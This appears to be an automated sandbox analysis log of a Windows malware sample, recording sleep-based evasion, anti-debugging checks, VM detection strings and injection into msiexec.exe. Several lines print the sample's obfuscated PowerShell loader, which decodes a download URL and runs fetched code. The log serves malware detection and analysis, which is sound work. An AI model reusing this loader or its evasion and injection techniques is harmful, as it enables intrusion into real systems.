Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596844			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596495			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596375			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596266			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596143			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596028			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595914			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595797			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595685			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595563			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595452			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595336			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595219			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595094			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594950			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594838			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594725			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594608			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594373			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594262			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594141			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5545			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4323			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8153			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1476			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5340	Thread sleep time: -3689348814741908s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2488	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -27670116110564310s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -600000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6340	Thread sleep count: 3931 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -599890s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6340	Thread sleep count: 5889 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -599769s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -599641s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -599531s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -599418s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -599297s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -599188s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -599063s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598937s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598828s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598719s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598609s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598500s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598391s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598266s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598141s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -598032s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -597907s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -597782s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -597672s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -597563s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -597438s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -597313s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -597188s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -597075s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596953s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596844s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596735s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596610s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596495s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596375s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596266s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596143s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -596028s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -595914s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -595797s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -595685s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -595563s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -595452s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -595336s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -595219s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -595094s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -594950s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -594838s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -594725s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -594608s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -594485s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -594373s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -594262s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6336	Thread sleep time: -594141s >= -30000s			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599769			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599531			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599418			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599188			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598937			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598828			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598719			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598609			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598500			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598391			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598266			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598141			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598032			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597907			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597782			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597672			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597563			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597438			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597313			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597188			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597075			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596953			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596844			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596495			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596375			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596266			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596143			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596028			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595914			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595797			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595685			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595563			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595452			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595336			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595219			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595094			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594950			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594838			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594725			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594608			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594373			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594262			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594141			Jump to behavior

Source: wscript.exe, 00000000.00000003.1714879318.0000024C0F823000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0
Source: powershell.exe, 00000001.00000002.1957262692.000002681DAA0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 8_2_0043F5C0 LdrInitializeThunk,

8_2_0043F5C0

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Source: Yara match	File source: amsi64_3300.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5432, type: MEMORYSTR

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4090000

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe c			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#besprjtet playstow stunsail vrangforestillingers ergotisms idealism overthrowing #>;$requestionerntrenchant='gem';<#formanings reaktion randmorner backwall protore #>;$oplyser=$syriacism+$host.ui; function franarrendes($kampucheanske){if ($oplyser) {$grangerizer++;}$automobiler=$forsnakket+$kampucheanske.'length'-$grangerizer; for( $requestioner=5;$requestioner -lt $automobiler;$requestioner+=6){$heavenward214=$requestioner;$ressentimentsflelsers+=$kampucheanske[$requestioner];$spindleshanks='nougatfarvede255';}$ressentimentsflelsers;}function forbindingers($sweateren){ . ($leukophoresis) ($sweateren);}$modulariteten85=franarrendes 'rum em lunnono anzkonkui zircl enerl annaaoffgo/ expe ';$modulariteten85+=franarrendes 'forha5genn..olief0munde qeth(kamlewd speiw.rloniag tdgrundotyd.lwnordis.inds st rn undetvolun aphyl1found0orrtr. fart0dunel;attem roomw.ettiikonomnre dd6 anab4 ach ; tand s.mpsxchamp6torve4snkni;n.mph carbor vaa vunder:forby1agnat3foreb1hydro. nond0 m ga)bolig filmsg b koesviencm notkdesmoobet t/sp ci2disfo0frak,1curvi0klim 0enfol1na ur0 fops1 sni tandpf mageisobraraftrae,ofanf indioinvarxsaftf/skole1sky r3yderp1 para.adven0fall ';$regnetegnet=franarrendes 'niffeu sonospreleestamsrloz n-frontavideogpo.uledi denfejletnowel ';$delggelses=franarrendes 'brookhtsnintunpertunasspodon scentr: aan/ bygn/pr.grdd,sgerudnytiflsomv non ewoods.omheggdhurroskr aoinfleghelpilh lefelinne.photocno.gao iphom varm/avl.surebubc abru?i.kviekomp,xko tep.piskoover rbriskt en e=prosed fvnnounig,wbu.den fjenl arusocen rasaggidret r&klenei omveddof m= ktio1saltio emoub.otlcbac sv emulaappetkpseu,urespicpugenytim rfcrocugankomsklemry versls,jlges ewa0aaref-f remrkendiuonla 3wa rguelvilz klbnk diffn sdnidbog,vesemid2 .emia.ittelsyfilm semijune lpomdig ';$coleopteroid=franarrendes 'coff >disge ';$leukophoresis=franarrendes 'v,ticiwoundeci.enxsynon ';$requestionernkassoerne='papyroplastics';$kontagis='\platyhelminthic195.end';forbindingers (franarrendes 'knivs$spisegg ssel skijol,nkbbra zia remrld.gab: v,ewdchinbe acuicy,lloapeachrsnoenbrhabdomen on mi.tyantihl sta.afavo.tu stoesysteddextr= coar$remuseen.rvntransvsan.s:gtebaa sikkpp ethpdi pedpunteastunntforlgabackn+sekul$.romak,ermuohazanngreevtindvaariob,gcymbeigenfostraum ');forbindingers (franarrendes 'cuisi$c,liiglingel arado.ommebwhip areboullabio: frigldatasilobeltcurt hfrygtoti.anp brn hjeq ei flyvlrussiorektou eskysskudd=be ry$sabr dyokeaelachrlkie,egarbejgtergie frazl irrusinquieart is.orma.maghissm gepindvilu affisaddutlden.(rea i$tr,ckczigzaoudestlkar oe ieclolaspeppelortregnlebaronrnatioo cereikogendpark,) inct ');forbindingers (franarrendes 'hu,ba[ ,nten lasse guiltpedan.inse.senergeh vedrgnistvdivi.iin,rtcungd efortipfun,oo affaicloamncompitepichmbugh ab.rnenbarquanonutg altaeanaerrunpro]arbej: vndg: lumbssparserentec ,nteu semirwigeoi sluktchokiy mu kpgolemrspe c
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#besprjtet playstow stunsail vrangforestillingers ergotisms idealism overthrowing #>;$requestionerntrenchant='gem';<#formanings reaktion randmorner backwall protore #>;$oplyser=$syriacism+$host.ui; function franarrendes($kampucheanske){if ($oplyser) {$grangerizer++;}$automobiler=$forsnakket+$kampucheanske.'length'-$grangerizer; for( $requestioner=5;$requestioner -lt $automobiler;$requestioner+=6){$heavenward214=$requestioner;$ressentimentsflelsers+=$kampucheanske[$requestioner];$spindleshanks='nougatfarvede255';}$ressentimentsflelsers;}function forbindingers($sweateren){ . ($leukophoresis) ($sweateren);}$modulariteten85=franarrendes 'rum em lunnono anzkonkui zircl enerl annaaoffgo/ expe ';$modulariteten85+=franarrendes 'forha5genn..olief0munde qeth(kamlewd speiw.rloniag tdgrundotyd.lwnordis.inds st rn undetvolun aphyl1found0orrtr. fart0dunel;attem roomw.ettiikonomnre dd6 anab4 ach ; tand s.mpsxchamp6torve4snkni;n.mph carbor vaa vunder:forby1agnat3foreb1hydro. nond0 m ga)bolig filmsg b koesviencm notkdesmoobet t/sp ci2disfo0frak,1curvi0klim 0enfol1na ur0 fops1 sni tandpf mageisobraraftrae,ofanf indioinvarxsaftf/skole1sky r3yderp1 para.adven0fall ';$regnetegnet=franarrendes 'niffeu sonospreleestamsrloz n-frontavideogpo.uledi denfejletnowel ';$delggelses=franarrendes 'brookhtsnintunpertunasspodon scentr: aan/ bygn/pr.grdd,sgerudnytiflsomv non ewoods.omheggdhurroskr aoinfleghelpilh lefelinne.photocno.gao iphom varm/avl.surebubc abru?i.kviekomp,xko tep.piskoover rbriskt en e=prosed fvnnounig,wbu.den fjenl arusocen rasaggidret r&klenei omveddof m= ktio1saltio emoub.otlcbac sv emulaappetkpseu,urespicpugenytim rfcrocugankomsklemry versls,jlges ewa0aaref-f remrkendiuonla 3wa rguelvilz klbnk diffn sdnidbog,vesemid2 .emia.ittelsyfilm semijune lpomdig ';$coleopteroid=franarrendes 'coff >disge ';$leukophoresis=franarrendes 'v,ticiwoundeci.enxsynon ';$requestionernkassoerne='papyroplastics';$kontagis='\platyhelminthic195.end';forbindingers (franarrendes 'knivs$spisegg ssel skijol,nkbbra zia remrld.gab: v,ewdchinbe acuicy,lloapeachrsnoenbrhabdomen on mi.tyantihl sta.afavo.tu stoesysteddextr= coar$remuseen.rvntransvsan.s:gtebaa sikkpp ethpdi pedpunteastunntforlgabackn+sekul$.romak,ermuohazanngreevtindvaariob,gcymbeigenfostraum ');forbindingers (franarrendes 'cuisi$c,liiglingel arado.ommebwhip areboullabio: frigldatasilobeltcurt hfrygtoti.anp brn hjeq ei flyvlrussiorektou eskysskudd=be ry$sabr dyokeaelachrlkie,egarbejgtergie frazl irrusinquieart is.orma.maghissm gepindvilu affisaddutlden.(rea i$tr,ckczigzaoudestlkar oe ieclolaspeppelortregnlebaronrnatioo cereikogendpark,) inct ');forbindingers (franarrendes 'hu,ba[ ,nten lasse guiltpedan.inse.senergeh vedrgnistvdivi.iin,rtcungd efortipfun,oo affaicloamncompitepichmbugh ab.rnenbarquanonutg altaeanaerrunpro]arbej: vndg: lumbssparserentec ,nteu semirwigeoi sluktchokiy mu kpgolemrspe c
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#besprjtet playstow stunsail vrangforestillingers ergotisms idealism overthrowing #>;$requestionerntrenchant='gem';<#formanings reaktion randmorner backwall protore #>;$oplyser=$syriacism+$host.ui; function franarrendes($kampucheanske){if ($oplyser) {$grangerizer++;}$automobiler=$forsnakket+$kampucheanske.'length'-$grangerizer; for( $requestioner=5;$requestioner -lt $automobiler;$requestioner+=6){$heavenward214=$requestioner;$ressentimentsflelsers+=$kampucheanske[$requestioner];$spindleshanks='nougatfarvede255';}$ressentimentsflelsers;}function forbindingers($sweateren){ . ($leukophoresis) ($sweateren);}$modulariteten85=franarrendes 'rum em lunnono anzkonkui zircl enerl annaaoffgo/ expe ';$modulariteten85+=franarrendes 'forha5genn..olief0munde qeth(kamlewd speiw.rloniag tdgrundotyd.lwnordis.inds st rn undetvolun aphyl1found0orrtr. fart0dunel;attem roomw.ettiikonomnre dd6 anab4 ach ; tand s.mpsxchamp6torve4snkni;n.mph carbor vaa vunder:forby1agnat3foreb1hydro. nond0 m ga)bolig filmsg b koesviencm notkdesmoobet t/sp ci2disfo0frak,1curvi0klim 0enfol1na ur0 fops1 sni tandpf mageisobraraftrae,ofanf indioinvarxsaftf/skole1sky r3yderp1 para.adven0fall ';$regnetegnet=franarrendes 'niffeu sonospreleestamsrloz n-frontavideogpo.uledi denfejletnowel ';$delggelses=franarrendes 'brookhtsnintunpertunasspodon scentr: aan/ bygn/pr.grdd,sgerudnytiflsomv non ewoods.omheggdhurroskr aoinfleghelpilh lefelinne.photocno.gao iphom varm/avl.surebubc abru?i.kviekomp,xko tep.piskoover rbriskt en e=prosed fvnnounig,wbu.den fjenl arusocen rasaggidret r&klenei omveddof m= ktio1saltio emoub.otlcbac sv emulaappetkpseu,urespicpugenytim rfcrocugankomsklemry versls,jlges ewa0aaref-f remrkendiuonla 3wa rguelvilz klbnk diffn sdnidbog,vesemid2 .emia.ittelsyfilm semijune lpomdig ';$coleopteroid=franarrendes 'coff >disge ';$leukophoresis=franarrendes 'v,ticiwoundeci.enxsynon ';$requestionernkassoerne='papyroplastics';$kontagis='\platyhelminthic195.end';forbindingers (franarrendes 'knivs$spisegg ssel skijol,nkbbra zia remrld.gab: v,ewdchinbe acuicy,lloapeachrsnoenbrhabdomen on mi.tyantihl sta.afavo.tu stoesysteddextr= coar$remuseen.rvntransvsan.s:gtebaa sikkpp ethpdi pedpunteastunntforlgabackn+sekul$.romak,ermuohazanngreevtindvaariob,gcymbeigenfostraum ');forbindingers (franarrendes 'cuisi$c,liiglingel arado.ommebwhip areboullabio: frigldatasilobeltcurt hfrygtoti.anp brn 